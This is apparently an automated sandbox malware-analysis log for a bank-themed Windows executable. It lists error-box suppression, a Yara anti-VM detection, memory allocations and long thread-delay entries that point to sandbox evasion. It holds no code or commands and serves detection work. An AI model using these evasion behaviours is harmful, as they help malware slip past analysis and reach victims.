Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match

File source: Process Memory Space: denizbank 25.11.2024 E80 aspc.exe PID: 7416, type: MEMORYSTR

Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Memory allocated: E10000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Memory allocated: 2800000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Memory allocated: 2750000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Memory allocated: 77C0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Memory allocated: 87C0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Memory allocated: 8970000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Memory allocated: 9970000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Memory allocated: 1180000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Memory allocated: 2D30000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Memory allocated: 2A80000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Thread delayed: delay time: 599891	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Thread delayed: delay time: 599782	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Thread delayed: delay time: 599657	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Thread delayed: delay time: 599532	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Thread delayed: delay time: 599407	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Thread delayed: delay time: 599297	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Thread delayed: delay time: 599188	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Thread delayed: delay time: 599063	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Thread delayed: delay time: 598938	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Thread delayed: delay time: 598813	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Thread delayed: delay time: 598688	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Thread delayed: delay time: 598577	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Thread delayed: delay time: 598469	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Thread delayed: delay time: 598344	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Thread delayed: delay time: 598235	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Thread delayed: delay time: 598110	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Thread delayed: delay time: 597969	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Thread delayed: delay time: 597844	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Thread delayed: delay time: 597735	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Thread delayed: delay time: 597610	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Thread delayed: delay time: 597485	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Thread delayed: delay time: 597360	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Thread delayed: delay time: 597235	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Thread delayed: delay time: 597110	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Thread delayed: delay time: 596985	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Thread delayed: delay time: 596860	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Thread delayed: delay time: 596735	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Thread delayed: delay time: 596610	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Thread delayed: delay time: 596485	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Thread delayed: delay time: 596360	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Thread delayed: delay time: 596235	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Thread delayed: delay time: 596110	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Thread delayed: delay time: 595985	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Thread delayed: delay time: 595860	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Thread delayed: delay time: 595735	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Thread delayed: delay time: 595610	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Thread delayed: delay time: 595485	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Thread delayed: delay time: 595360	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Thread delayed: delay time: 595235	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Thread delayed: delay time: 595110	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Thread delayed: delay time: 594985	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Thread delayed: delay time: 594860	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Thread delayed: delay time: 594735	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Thread delayed: delay time: 594610	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Thread delayed: delay time: 594485	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Thread delayed: delay time: 594360	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Thread delayed: delay time: 594235	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Thread delayed: delay time: 594110	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Thread delayed: delay time: 593985	Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5980	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3844	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Window / User API: threadDelayed 1689	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Window / User API: threadDelayed 8131	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Window / User API: foregroundWindowGot 1773	Jump to behavior

Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe TID: 7436	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7820	Thread sleep time: -2767011611056431s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe TID: 7900	Thread sleep count: 36 > 30	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe TID: 7900	Thread sleep time: -33204139332677172s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe TID: 7900	Thread sleep time: -600000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe TID: 7900	Thread sleep time: -599891s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe TID: 7904	Thread sleep count: 1689 > 30	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe TID: 7904	Thread sleep count: 8131 > 30	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe TID: 7900	Thread sleep time: -599782s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe TID: 7900	Thread sleep count: 39 > 30	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe TID: 7900	Thread sleep time: -599657s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe TID: 7900	Thread sleep time: -599532s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe TID: 7900	Thread sleep time: -599407s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe TID: 7900	Thread sleep time: -599297s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe TID: 7900	Thread sleep time: -599188s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe TID: 7900	Thread sleep time: -599063s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe TID: 7900	Thread sleep time: -598938s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe TID: 7900	Thread sleep time: -598813s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe TID: 7900	Thread sleep time: -598688s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe TID: 7900	Thread sleep time: -598577s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe TID: 7900	Thread sleep time: -598469s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe TID: 7900	Thread sleep time: -598344s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe TID: 7900	Thread sleep time: -598235s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe TID: 7900	Thread sleep time: -598110s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe TID: 7900	Thread sleep time: -597969s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe TID: 7900	Thread sleep time: -597844s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe TID: 7900	Thread sleep time: -597735s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe TID: 7900	Thread sleep time: -597610s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe TID: 7900	Thread sleep time: -597485s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe TID: 7900	Thread sleep time: -597360s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe TID: 7900	Thread sleep time: -597235s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe TID: 7900	Thread sleep time: -597110s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe TID: 7900	Thread sleep time: -596985s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe TID: 7900	Thread sleep time: -596860s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe TID: 7900	Thread sleep time: -596735s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe TID: 7900	Thread sleep time: -596610s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe TID: 7900	Thread sleep time: -596485s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe TID: 7900	Thread sleep time: -596360s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe TID: 7900	Thread sleep time: -596235s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe TID: 7900	Thread sleep time: -596110s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe TID: 7900	Thread sleep time: -595985s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe TID: 7900	Thread sleep time: -595860s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe TID: 7900	Thread sleep time: -595735s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe TID: 7900	Thread sleep time: -595610s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe TID: 7900	Thread sleep time: -595485s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe TID: 7900	Thread sleep time: -595360s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe TID: 7900	Thread sleep time: -595235s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe TID: 7900	Thread sleep time: -595110s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe TID: 7900	Thread sleep time: -594985s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe TID: 7900	Thread sleep time: -594860s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe TID: 7900	Thread sleep time: -594735s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe TID: 7900	Thread sleep time: -594610s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe TID: 7900	Thread sleep time: -594485s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe TID: 7900	Thread sleep time: -594360s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe TID: 7900	Thread sleep time: -594235s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe TID: 7900	Thread sleep time: -594110s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe TID: 7900	Thread sleep time: -593985s >= -30000s	Jump to behavior

Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Thread delayed: delay time: 599891	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Thread delayed: delay time: 599782	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Thread delayed: delay time: 599657	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Thread delayed: delay time: 599532	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Thread delayed: delay time: 599407	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Thread delayed: delay time: 599297	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Thread delayed: delay time: 599188	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Thread delayed: delay time: 599063	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Thread delayed: delay time: 598938	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Thread delayed: delay time: 598813	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Thread delayed: delay time: 598688	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Thread delayed: delay time: 598577	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Thread delayed: delay time: 598469	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Thread delayed: delay time: 598344	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Thread delayed: delay time: 598235	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Thread delayed: delay time: 598110	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Thread delayed: delay time: 597969	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Thread delayed: delay time: 597844	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Thread delayed: delay time: 597735	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Thread delayed: delay time: 597610	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Thread delayed: delay time: 597485	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Thread delayed: delay time: 597360	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Thread delayed: delay time: 597235	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Thread delayed: delay time: 597110	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Thread delayed: delay time: 596985	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Thread delayed: delay time: 596860	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Thread delayed: delay time: 596735	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Thread delayed: delay time: 596610	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Thread delayed: delay time: 596485	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Thread delayed: delay time: 596360	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Thread delayed: delay time: 596235	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Thread delayed: delay time: 596110	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Thread delayed: delay time: 595985	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Thread delayed: delay time: 595860	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Thread delayed: delay time: 595735	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Thread delayed: delay time: 595610	Jump to behavior
